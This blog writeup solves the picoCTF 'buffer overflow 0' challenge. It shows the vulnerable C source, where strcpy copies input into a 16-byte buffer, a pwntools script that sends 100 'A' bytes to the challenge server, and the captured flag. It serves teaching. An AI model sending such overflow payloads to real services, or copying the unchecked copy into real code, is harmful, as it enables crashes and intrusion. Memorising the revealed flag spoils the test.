picoCTF buffer overflow 0 [100 points]
Description
Smash the stack. Let's start off simple: can you overflow the correct buffer? The program is available here. You can view source here. And connect with it using:
Hints
How can you trigger the flag to print?
If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.
Run man gets and read the BUGS section. How many characters can the program really read?
Solution
gcc vuln.c -m32 -fno-stack-protector -z noexecstack -o vuln
Looking at the sigsegv_handler function, we can see that simply overflowing the buffer is enough to print the flag: the handler is installed for SIGSEGV, and vuln() copies the input into the 16-byte buf2 with strcpy and no length check, so a long input runs off the end of buf2, the program crashes, and the handler prints the flag.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* flag is a global defined elsewhere in vuln.c (not shown here). */

/* Installed for SIGSEGV: any crash prints the flag and exits. */
void sigsegv_handler(int sig) {
    printf("%s\n", flag);
    fflush(stdout);
    exit(1);
}

/* No bounds check: input longer than buf2 overwrites the stack. */
void vuln(char *input) {
    char buf2[16];
    strcpy(buf2, input);
}
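As an added example (not part of this writeup or of the challenge's vuln.c), here is what a bounds-checked counterpart of vuln() looks like, fed the same shape of input as the 100-byte payload used below; BUF2_SIZE, vuln_checked and try_payload are names chosen for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF2_SIZE 16  /* same size as buf2 in the challenge's vuln() */

/* Hardened counterpart of vuln(). The original does strcpy(buf2, input)
 * with no length check, so anything longer than 15 bytes plus the NUL
 * runs past buf2 into the saved frame data (hence the SIGSEGV). This
 * version measures the input first and refuses to copy if it does not fit.
 * Returns the number of bytes copied, or -1 if the input would overflow. */
int vuln_checked(const char *input) {
    char buf2[BUF2_SIZE];
    size_t len = 0;
    /* Bounded scan: never looks further than BUF2_SIZE bytes into input. */
    while (len < BUF2_SIZE && input[len] != '\0') {
        len++;
    }
    if (len >= BUF2_SIZE) {
        return -1;  /* no room left for the terminating NUL: reject */
    }
    memcpy(buf2, input, len + 1);  /* copy including the NUL */
    return (int)strlen(buf2);      /* buf2 is guaranteed terminated here */
}

/* Build a constructed payload of n 'A' bytes (the shape of b'A' * 100 in
 * the pwntools script) and run it through vuln_checked(). */
int try_payload(size_t n) {
    char *payload = malloc(n + 1);
    if (payload == NULL) {
        return -1;
    }
    memset(payload, 'A', n);
    payload[n] = '\0';
    int rc = vuln_checked(payload);
    free(payload);
    return rc;
}

int main(void) {
    printf("15 bytes:  %d\n", try_payload(15));   /* 15: fits */
    printf("16 bytes:  %d\n", try_payload(16));   /* -1: would overflow */
    printf("100 bytes: %d\n", try_payload(100));  /* -1: rejected */
    return 0;
}
```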
Send the input with pwntools:
from pwn import *

# Connect to the challenge instance (host and port from the picoCTF page).
r = remote("saturn.picoctf.net", 55984)

# 100 'A' bytes is far more than the 16-byte buf2, so strcpy overruns it,
# the program segfaults, and sigsegv_handler prints the flag.
payload = b'A' * 100
print(f'payload:{payload}')
r.sendline(payload)

r.recv()  # consume the program's prompt
print(f'flag:{r.recv().decode()}')
flag:
picoCTF{ov3rfl0ws_ar3nt_that_bad_ef01832d}
Unless otherwise stated, all posts on this blog are licensed under CC BY-NC-SA 4.0. When reposting, please credit LuYee6813's Blog | 技術分享!